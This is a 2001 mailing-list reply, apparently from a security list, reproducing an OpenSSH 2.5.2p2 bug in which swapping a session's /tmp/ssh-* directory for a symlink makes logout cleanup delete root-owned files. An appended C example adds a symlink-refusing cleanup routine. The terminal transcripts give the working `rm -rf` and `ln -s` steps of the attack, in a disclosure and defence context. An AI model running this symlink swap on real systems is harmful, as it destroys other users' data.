Re: SSH allows deletion of other users files...
On Mon, Jun 04, 2001 at 04:03:51PM -0500, Leonard Leblanc wrote:
> > [root@clarity /root]# touch /cookies;ls /cookies
> > > /cookies
> > > [root@clarity /root]# ssh zen@localhost
> > > zen@localhost's password:
> > > [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
> > > [zen@clarity zen]$ logout
> >
> > > [root@clarity /root]# ls /cookies
> > > /bin/ls: /cookies: No such file or directory
> >
> > I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2
> >
>
> I could not duplicate this with OpenSSH-1.2.3, protocol version 1.5 on a
> Debian box.
hmm... it appears to work on my system too...
alm:~$ id
uid=1000(alson) gid=1001(friends) groups=1001(friends)
alm:~$ su -
Password:
alm:~# mkdir /root/secret
alm:~# chmod 700 /root/secret
alm:~# chmod 600 /root/secret/cookies
alm:~# ls -l /root/secret/
total 0
-rw------- 1 root root 0 Jun 5 00:04 cookies
alm:~# logout
alm:~$ ssh localhost
alson@localhost's password:
alm:~$ rm -rf /tmp/ssh-XXoadRxj
alm:~$ ln -s /root/secret /tmp/ssh-XXoadRxj
alm:~$ exit
Connection to localhost closed.
alm:~$ su -
Password:
alm:~# ls -la /root/secret
total 3
drwx------ 2 root root 1024 Jun 5 00:07 .
drwx------ 33 root root 2048 Jun 5 00:04 ..
alm:~# sshd -V
sshd: option requires an argument -- V
sshd version OpenSSH_2.5.2p2
Usage: sshd [options]
...
alm:~# logout
alm:~$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090601f
BTW: I use the ssh2 protocol by default, so it's used here too.
Don't call your important files cookies ;)
--
,-------------------------------------------.
> Name: Alson van der Meulen <
> Personal: alson@linuxfreak.nl <
> School: alson@gymnasiumleiden.nl <
`-------------------------------------------'
Do you smell something?
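
In the transcript above, the contents of the directory a swapped-in symlink points at are gone after logout. The following is an added example, not part of the original post and not OpenSSH code: a by-descriptor cleanup that refuses a symlink at the session path. The names `safe_cleanup` and `demo_swap_survives`, and the paths in the demo, are hypothetical and constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L /* added example, not OpenSSH code */
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove a session temp dir; 0 on success, -1 if the path is refused. */
int safe_cleanup(const char *path, uid_t owner)
{
    struct stat st;
    struct dirent *de;
    DIR *d;
    /* O_NOFOLLOW: fail if the last path component is a symlink. */
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    /* Verify the object actually opened, not whatever the name points at. */
    if (fstat(fd, &st) < 0 || st.st_uid != owner || (d = fdopendir(fd)) == NULL) {
        close(fd);
        return -1;
    }
    while ((de = readdir(d)) != NULL) {
        if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, ".."))
            continue;
        unlinkat(dirfd(d), de->d_name, 0); /* relative to the verified fd */
    }
    closedir(d);
    return rmdir(path) == 0 ? 0 : -1; /* rmdir(2) refuses a symlink */
}

/* Constructed scenario: returns 1 if the victim file survives the swap. */
int demo_swap_survives(void)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX", victim[64], file[80], sess[64];
    struct stat st;
    if (mkdtemp(base) == NULL)
        return 0;
    snprintf(victim, sizeof victim, "%s/secret", base);
    snprintf(file, sizeof file, "%s/cookies", victim);
    snprintf(sess, sizeof sess, "%s/ssh-XXdemo", base);
    mkdir(victim, 0700);
    close(open(file, O_CREAT | O_WRONLY, 0600));
    if (symlink(victim, sess) != 0) /* the swap shown in the post */
        return 0;
    return safe_cleanup(sess, getuid()) == -1 && stat(file, &st) == 0;
}
```

The ownership check takes the expected session user's uid, so a directory owned by anyone else is refused even when it is a real directory.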